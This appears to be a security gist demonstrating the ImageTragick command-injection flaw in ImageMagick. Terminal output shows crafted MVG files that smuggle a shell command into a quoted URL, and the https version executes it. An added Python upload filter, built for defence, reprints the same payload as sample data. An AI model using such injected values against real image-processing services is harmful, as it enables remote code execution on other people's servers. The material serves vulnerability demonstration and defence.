Created May 4, 2016 23:51
Remember to enable security for that added fuck you when exploiting ImageTragick
## ImageTragick with HTTPS URL results in code execution
vagrant@default-ubuntu-1404:~$ cat image-https.mvg
push graphic-context
viewbox 0 0 1 1 image over 0,0 0,0 'https://www.imagemagick.org"; echo CODE EXECUTION"'
pop graphic-context
vagrant@default-ubuntu-1404:~$ convert image-https.mvg image-https.png
CODE EXECUTION
convert.im6: unable to open image `/tmp/magick-M70rA2Ky': No such file or directory @ error/blob.c/OpenBlob/2638.
convert.im6: unable to open file `/tmp/magick-M70rA2Ky': No such file or directory @ error/constitute.c/ReadImage/583.

## ImageTragick with HTTP URL does not result in execution
vagrant@default-ubuntu-1404:~$ cat image-http.mvg
push graphic-context
viewbox 0 0 1 1 image over 0,0 0,0 'http://www.imagemagick.org"; echo CODE EXECUTION"'
pop graphic-context
vagrant@default-ubuntu-1404:~$ convert image-http.mvg image-http.png
error : Unknown IO error
convert.im6: no decode delegate for this image format `/tmp/magick-O6pEKXco' @ error/constitute.c/ReadImage/544.
convert.im6: no data returned `http://localhost"; echo CODE EXECUTION"' @ error/url.c/ReadURLImage/232.
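
An added example, not part of the original gist: a pre-conversion upload check in Python that accepts only files whose leading bytes match an allowlisted raster format and, for anything else, reports quoted URL references containing characters that are special inside a double-quoted shell argument, as in both MVG files above. The function names, the allowlist and the sample bytes are assumptions constructed for illustration.

```python
import re

# Raster formats a hypothetical upload service accepts, keyed by magic bytes.
ALLOWED_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
                 b"GIF87a": "gif", b"GIF89a": "gif"}
# Single-quoted arguments in MVG text, e.g. image over 0,0 0,0 '<reference>'.
QUOTED_ARG = re.compile(rb"'([^'\r\n]*)'")
URL_SCHEME = re.compile(rb"^\s*(?:url\()?\s*([a-z][a-z0-9+.-]*):", re.I)
# Characters that stay special inside a double-quoted shell argument.
SHELL_META = re.compile(rb'["`$\\]')

# Constructed samples mirroring the two MVG files shown in the gist.
MVG_HTTPS = b"""push graphic-context
viewbox 0 0 1 1 image over 0,0 0,0 'https://www.imagemagick.org"; echo CODE EXECUTION"'
pop graphic-context
"""
MVG_HTTP = MVG_HTTPS.replace(b"https://", b"http://")
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8  # constructed header only


def sniff_format(data):
    """Return the allowlisted format matching the leading bytes, or None."""
    for magic, name in ALLOWED_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def inspect_upload(data):
    """Return (verdict, findings) for one uploaded file's bytes."""
    fmt = sniff_format(data)
    if fmt is not None:
        return "accept", [fmt]
    findings = []
    for match in QUOTED_ARG.finditer(data):
        ref = match.group(1)
        scheme = URL_SCHEME.match(ref)
        if scheme and SHELL_META.search(ref):
            findings.append((scheme.group(1).decode().lower(),
                             ref.decode(errors="replace")))
    verdict = "reject-suspicious" if findings else "reject-unknown-type"
    return verdict, findings


if __name__ == "__main__":
    for label, blob in (("https", MVG_HTTPS), ("http", MVG_HTTP), ("png", PNG_SAMPLE)):
        print(label, inspect_upload(blob))
```

Both MVG samples are rejected regardless of scheme; the transcript above shows only the https reference executing on that build, but the check does not rely on that distinction.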